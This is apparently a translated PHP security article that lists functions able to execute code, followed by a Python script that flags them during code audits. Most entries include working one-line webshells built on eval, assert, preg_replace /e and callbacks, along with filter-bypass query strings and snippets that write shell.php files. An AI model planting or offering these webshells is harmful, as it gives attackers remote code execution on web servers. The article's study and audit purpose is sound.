PHP has many functions that can execute code. They are often used to write one-line webshells ("one-sentence Trojans") and can lead to code execution vulnerabilities. This article summarizes the code execution functions.
Common code execution functions include:
eval(), assert(), preg_replace(), create_function()
array_map(), call_user_func(), call_user_func_array(), array_filter(), usort(), uasort()
File manipulation functions, dynamic functions ($a($b))
1. eval()
The eval() function evaluates a string as PHP code, as in the common one-line backdoor:
```php
<?php eval($_POST[cmd])?>
```
2. assert()
Similar to eval(), assert() executes a string as PHP code, as in:
Sample code:
```php
<?php
// ?cmd=phpinfo()
assert($_REQUEST[cmd]);
?>
```
3. preg_replace()
mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )
Searches subject for the parts that match pattern and replaces them with replacement.
preg_replace() is meant to perform a regular expression search and replace, but with the dangerous /e modifier it treats the replacement parameter as PHP code and executes it.
Sample code:
```php
<?php
// ?cmd=phpinfo()
@preg_replace("/abc/e",$_REQUEST['cmd'],"abcd");
?>
```
4. create_function()
create_function() is primarily used to create anonymous functions. If the parameters passed to it are not strictly filtered, an attacker can construct special strings and pass them to create_function() to execute arbitrary commands.
Code examples:
```php
<?php
// ?cmd=phpinfo();
$func = create_function('',$_REQUEST['cmd']);
$func();
?>
```
Reference links:
Code security: PHP create_function() injection command execution vulnerability
www.cnseay.com/1901/
Lovexm.blog.51cto.com/3567383/174…
Qqhack8.blog.163.com/blog/static…
5. array_map()
The array_map() function applies a user-defined function to each value in the array and returns an array holding the new values. The callback should accept as many arguments as there are arrays passed to array_map().
Code examples:
```php
<?php
// ?func=system&cmd=whoami
$func=$_GET['func'];
$cmd=$_GET['cmd'];
$array[0]=$cmd;
$new_array=array_map($func,$array);
//print_r($new_array);
?>
```
6. call_user_func() / call_user_func_array()
call_user_func(): the first argument is called as a callback function and the remaining arguments are passed to that callback.
call_user_func_array(): calls the callback function and passes it the elements of an array as its arguments.
```php
<?php
// ?cmd=phpinfo()
@call_user_func(assert,$_GET['cmd']);
?>
```
```php
<?php
// ?cmd=phpinfo()
$cmd=$_GET['cmd'];
$array[0]=$cmd;
call_user_func_array("assert",$array);
?>
```
7. array_filter()
array array_filter ( array $array [, callable $callback [, int $flag = 0 ]] )
Each value in the array is passed to the callback function in turn. If the callback returns true, the current value is included in the returned result array. The array keys are preserved.
```php
<?php
// ?func=system&cmd=whoami
$cmd=$_GET['cmd'];
$array1=array($cmd);
$func =$_GET['func'];
array_filter($array1,$func);
?>
```
8. usort(), uasort()
usort() sorts an array using a user-defined comparison function.
uasort() sorts the values of an array using a user-defined comparison function and maintains index association.
Code examples:
PHP environment >=5.6:
```
<?php usort(...$_GET); ?>
test.php?1[]=1-1&1[]=eval($_POST['x'])&2=assert
[POST]: x=phpinfo();
```
PHP environment >=<5.6 can use:
```
<?php usort($_GET,'asse'.'rt'); ?>
test.php?1=1+1&2=eval($_POST[x])
[POST]: x=phpinfo();
```
Source: www.wd0g.com/?p=190
www.leavesongs.com/PHP/bypass-…
9. File manipulation functions
The file_put_contents() function writes a string to a file.
The fputs() function writes to an open file.
Code examples:
```php
<?php
$test='<?php eval($_POST[cmd]);?>';
file_put_contents('test1.php',$test);
?>
```
```php
<?php
fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');
?>
```
10. Dynamic functions
A PHP function call can be assembled directly from strings: a variable holding the function name is called as if it were the function.
Code examples:
```php
<?php
// ?a=assert&b=phpinfo()
$_GET['a']($_GET['b']);
?>
```
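For code audit, the functions summarized above can serve as a sink list. The following is an added example, not code from the original article: a Python heuristic that flags these sinks in PHP source and marks whether their arguments trace back to request data. The names `scan`, `tainted_vars`, `is_tainted` and `SAMPLE` are assumptions of this example, and the sample file is constructed.

```python
import re

# Added example, not from the original page: regex heuristics for audit triage.
SUPERGLOBAL = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")
ASSIGN = re.compile(r"\$(\w+)(?:\[[^\]]*\])?\s*=(?!=)([^;]*);")
CALLBACKS = r"array_map|call_user_func(?:_array)?|array_filter|usort|uasort"
SINKS = [  # (label, regex whose "arg" group is the text checked for taint)
    ("eval/assert/create_function", re.compile(
        r"\b(?:eval|assert|create_function)\s*\((?P<arg>[^;]*)")),
    ("preg_replace /e", re.compile(
        r"""\bpreg_replace\s*\(\s*(['"])(.)[^'"]*?\2[a-zA-Z]*e[a-zA-Z]*\1(?P<arg>[^;]*)""")),
    ("callback", re.compile(r"\b(?:" + CALLBACKS + r")\s*\((?P<arg>[^;]*)")),
    ("file write", re.compile(r"\b(?:file_put_contents|fputs)\s*\((?P<arg>[^;]*)")),
    ("dynamic call", re.compile(r"(?P<arg>\$\w+(?:\[[^\]]*\])?)\s*\(")),
]
# Constructed sample input (hypothetical file modelled on the article's snippets).
SAMPLE = """<?php
$func = $_GET['func'];
$array[0] = $_GET['cmd'];
array_map($func, $array);
usort($items, 'cmp_by_date');
$_GET['a']($_GET['b']);
preg_replace("/abc/e", $_REQUEST['cmd'], "abcd");
preg_replace("/abc/i", "x", $title);
eval($template);
"""

def is_tainted(text, tainted):
    """True if text mentions a request superglobal or a tainted variable."""
    return bool(SUPERGLOBAL.search(text)) or any(
        re.search(r"\$" + re.escape(v) + r"\b", text) for v in tainted)

def tainted_vars(src):
    """Variables assigned, directly or transitively, from request data."""
    tainted, grew = set(), True
    while grew:  # repeat until no new variable is added (fixed point)
        grew = False
        for name, rhs in ASSIGN.findall(src):
            if name not in tainted and is_tainted(rhs, tainted):
                tainted.add(name)
                grew = True
    return tainted

def scan(src):
    """Return sorted (line, sink label, reaches_request_data) findings."""
    tainted = tainted_vars(src)
    return sorted(
        (src.count("\n", 0, m.start()) + 1, label, is_tainted(m.group("arg"), tainted))
        for label, rx in SINKS for m in rx.finditer(src))
```

A finding marked False is still a sink to review by hand; the taint check is flow-insensitive and only follows direct assignments.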